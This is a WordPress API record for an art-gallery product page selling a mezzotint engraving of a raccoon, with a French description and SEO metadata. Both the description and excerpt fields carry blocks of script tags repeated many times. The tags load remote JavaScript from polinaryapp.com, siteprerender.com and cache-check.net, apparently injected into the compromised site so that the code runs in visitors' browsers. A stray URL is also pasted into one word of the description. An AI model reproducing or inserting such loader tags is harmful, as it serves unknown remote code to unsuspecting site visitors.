{"id":959,"date":"2020-11-25T11:45:14","date_gmt":"2020-11-25T10:45:14","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=959"},"modified":"2020-12-13T16:26:40","modified_gmt":"2020-12-13T15:26:40","slug":"raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/","title":{"rendered":"Raton laveur, double gravure en mezzo-tinto sur cuivre"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue de la gravurhttps:\/\/tania-art-gallery.com\/index.php\/categorie-produit\/aquarelles\/e:<\/span><\/p>\n<p><span style=\"color: #000000;\">Raton-laveur, impression d&rsquo;une double gravure sur cuivre.<\/span><\/p>\n<p><span style=\"color: #000000;\">Raton laveur, gravure en taille-douce, r\u00e9alis\u00e9e sur une plaque de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \u00ab\u00a0mani\u00e8re noire\u00a0\u00bb.<\/span><\/p>\n<p><span style=\"color: #000000;\">Fond, le milieu naturel, est r\u00e9alis\u00e9 sur une plaque de cuivre en vernis mou.<\/span><\/p>\n<p><span style=\"color: #000000;\">Gravure r\u00e9alis\u00e9e en 2019<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendue encadr\u00e9e et avec un passe-partout<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1606846851880\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1606847012473\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607251207965\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607873052931\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607873107853\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\"><strong>Raton laveur,<\/strong> gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \u00ab\u00a0mani\u00e8re noire\u00a0\u00bb et en vernis mou<\/span><\/p>\n<p><span style=\"color: #000000;\">Gravure cr\u00e9\u00e9e en 2019<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendue encadr\u00e9e et avec un passe-partout<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1606846852043\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1606847012534\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607251208192\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607873053178\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607873108137\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":703,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-959","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","5":"hentry","6":"product_cat-gravures-en-couleur","8":"entry","9":"has-media","10":"owp-thumbs-layout-horizontal","11":"owp-btn-normal","12":"owp-tabs-layout-vertical","13":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Raton laveur, gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement &quot;mani\u00e8re noire&quot; et en vernis mou  Gravure cr\u00e9\u00e9e en 2019  Vendue encadr\u00e9e et avec un passe-partout\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-13T15:26:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"335\" \/>\n\t<meta property=\"og:image:height\" content=\"493\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/\",\"name\":\"Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg\",\"datePublished\":\"2020-11-25T10:45:14+00:00\",\"dateModified\":\"2020-12-13T15:26:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg\",\"width\":335,\"height\":493,\"caption\":\"Raton-laveur, double gravure sur cuivre en mezzo-tinto et vernis mou, couleur, 2019\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Raton laveur, double gravure en mezzo-tinto sur cuivre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/","og_locale":"fr_FR","og_type":"article","og_title":"Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Raton laveur, gravure en taille-douce, r\u00e9alis\u00e9e sur deux plaques de cuivre en mezzo-tinto, proc\u00e9d\u00e9 appel\u00e9 \u00e9galement \"mani\u00e8re noire\" et en vernis mou  Gravure cr\u00e9\u00e9e en 2019  Vendue encadr\u00e9e et avec un passe-partout","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-13T15:26:40+00:00","og_image":[{"width":335,"height":493,"url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/","name":"Raton laveur, double gravure en mezzo-tinto sur cuivre - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage"},"image":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage"},"thumbnailUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg","datePublished":"2020-11-25T10:45:14+00:00","dateModified":"2020-12-13T15:26:40+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#primaryimage","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/20190610_095231-1-e1606499961921.jpg","width":335,"height":493,"caption":"Raton-laveur, double gravure sur cuivre en mezzo-tinto et vernis mou, couleur, 2019"},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/raton-laveur-double-gravure-en-mezzo-tinto-sur-cuivre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Raton laveur, double gravure en mezzo-tinto sur cuivre"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/959","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media\/703"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=959"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}